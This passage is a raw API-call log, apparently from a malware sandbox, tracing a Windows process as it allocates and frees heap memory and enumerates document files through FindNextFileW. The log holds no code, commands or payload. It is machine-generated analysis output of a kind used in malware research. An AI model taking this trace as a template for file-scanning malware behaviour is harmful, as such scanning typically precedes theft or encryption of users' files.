Flags=0x0, Size=0x4) returned 0x690b60 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.467] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0073.467] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.468] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.468] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.468] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.468] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.468] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.468] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.468] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.889] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c1a880, ftCreationTime.dwHighDateTime=0x1d5e27d, ftLastAccessTime.dwLowDateTime=0xf76343c0, ftLastAccessTime.dwHighDateTime=0x1d57bc1, ftLastWriteTime.dwLowDateTime=0xf76343c0, ftLastWriteTime.dwHighDateTime=0x1d57bc1, nFileSizeHigh=0x0, nFileSizeLow=0x89e, dwReserved0=0x10, dwReserved1=0x657690, cFileName="6kBHfeDGIoa.pptx", cAlternateFileName="6KBHFE~1.PPT")) returned 1 [0073.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e20 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.890] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.891] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.891] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0073.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0073.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.893] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.893] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.893] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.893] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.893] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.894] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x10, dwReserved1=0x657690, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0073.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.894] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0073.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.894] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.895] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.895] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.895] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.895] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.896] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.896] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.896] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.897] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.897] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0073.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.898] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.898] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.898] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.898] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.899] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaa3530, ftCreationTime.dwHighDateTime=0x1d5ccc5, ftLastAccessTime.dwLowDateTime=0x6f08b940, ftLastAccessTime.dwHighDateTime=0x1d5ab25, ftLastWriteTime.dwLowDateTime=0x6f08b940, ftLastWriteTime.dwHighDateTime=0x1d5ab25, nFileSizeHigh=0x0, nFileSizeLow=0xfcf2, dwReserved0=0x10, dwReserved1=0x657690, cFileName="dXJHIETG4kltTzJ3VC.pptx", cAlternateFileName="DXJHIE~1.PPT")) returned 1 [0073.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.899] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.899] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.900] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.900] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.900] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8ab8 [0073.900] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.900] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0073.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bd0 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0073.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0073.901] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x110) returned 0x6bb0c0 [0073.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9a28 | out: hHeap=0x650000) returned 1 [0073.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.901] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.902] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0073.902] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0073.902] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b348 [0073.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0073.902] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x862f1b80, ftCreationTime.dwHighDateTime=0x1d57779, ftLastAccessTime.dwLowDateTime=0x8cd8dec0, ftLastAccessTime.dwHighDateTime=0x1d57a90, ftLastWriteTime.dwLowDateTime=0x8cd8dec0, ftLastWriteTime.dwHighDateTime=0x1d57a90, nFileSizeHigh=0x0, nFileSizeLow=0x138f3, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="F8kGUIlkgYER.xlsx", cAlternateFileName="F8KGUI~1.XLS")) returned 1 [0073.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2d0 [0073.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.902] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ac0 [0073.902] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de28 | out: hHeap=0x650000) returned 1 [0073.903] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: 